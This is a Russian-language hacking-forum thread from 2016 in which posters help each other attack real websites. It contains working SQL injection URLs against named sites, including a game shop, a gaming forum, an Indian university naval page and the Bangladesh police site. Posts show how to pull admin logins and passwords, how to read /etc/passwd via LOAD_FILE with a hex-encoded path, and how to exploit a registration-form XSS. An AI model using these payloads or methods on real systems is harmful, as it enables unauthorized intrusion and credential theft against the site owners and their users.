ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

16.10.2016, 22:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 8228
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
Через юнион и не будет
может подскажите как? я дальше сам буду ковырять
|
|
|
|

17.10.2016, 01:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 8589
Репутация:
0
|
|
никогда не останавливайся на скули которая не выводится,если есть рядом другая более удобная
http://www.gamepowerbazaar.com//stor...N+SELECT+1,2,3
вывод увидишь
пример:
http://www.gamepowerbazaar.com//sto...1,2,TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLE S
фильтруются скобки походу ()
p.s.
.SpoilerTarget" type="button">Spoiler: или так
p.s. можно havi' ем ,то есть подставляешь все данные как на рисунке:
http://i67.tinypic.com/23wk64l.jpg
то есть получаем вывод через error base sql injection
затем уже ручками выводим логины+ пассы
http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+0, 1
1й админ
http://www.gamepowerbazaar.com//sto...adminName,adminPassword+FROM+admins+limit+1, 1
2й админ
админку не искал ,да и странные пароли админов
а вообще это "commersus shop" .они уязвимы
вот почитай как пароли расшифровать
http://downloads.securityfocus.com/v...ce_mult_exp.pl
вот.
|
|
|
|

17.10.2016, 21:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 8469
Репутация:
1
|
|
Есть форма с ХSS в поле регистрации , но также есть токен , который не позволяет скопировать форму и юзать ее с хостинга . В таком случае никак не получится воспользоватся уязвимостю ? Или можно post переделать в get как то ?
|
|
|
|

18.10.2016, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 8228
Репутация:
0
|
|
найдена дырка в http://www.gamers-forum.com/misc.php тип инъекции (post) воот с такими параметрами, vsa_send=Submit&amount=if(now()%3dsysdate()%2cslee p(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22X OR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&chooser=5&securitytoken=guest
пробовал через мап и хавидж, на большее пока меня не хватило, подскажите есликто знает, как с этим дальше бороться?
|
|
|
|

03.11.2016, 14:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 61136
Репутация:
32
|
|
|
|
|
|

04.11.2016, 04:44
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме: 23906
Репутация:
-5
|
|
|
|
|

04.11.2016, 20:58
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
|
|
|

05.11.2016, 11:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись
1 -
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4,5,6,7,8,9,10,11,12+--+-[/COLOR][/COLOR]
2-
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-[/COLOR][/COLOR]
как прочитать файл
|
|
|
|

05.11.2016, 16:37
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
Сообщение от BabaDook
BabaDook said:
↑
Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись
1 -
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4,5,6,7,8,9,10,11,12+--+-[/COLOR][/COLOR]
2-
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-[/COLOR][/COLOR]
как прочитать файл
LOAD_FILE('/etc/passwd') вместо user()
|
|
|

05.11.2016, 16:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 8589
Репутация:
0
|
|
Сообщение от BabaDook
BabaDook said:
↑
Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись
1 -
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4,5,6,7,8,9,10,11,12+--+-[/COLOR][/COLOR]
2-
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-[/COLOR][/COLOR]
как прочитать файл
1
http://www.naval.iitkgp.ernet.in/me...file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+
или
http://www.naval.iitkgp.ernet.in/me...74632F706173737764),3,4,5,6,7,8,9,10,11,12--+
где 0x2F6574632F706173737764= hex(/etc/passwd)
2
нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|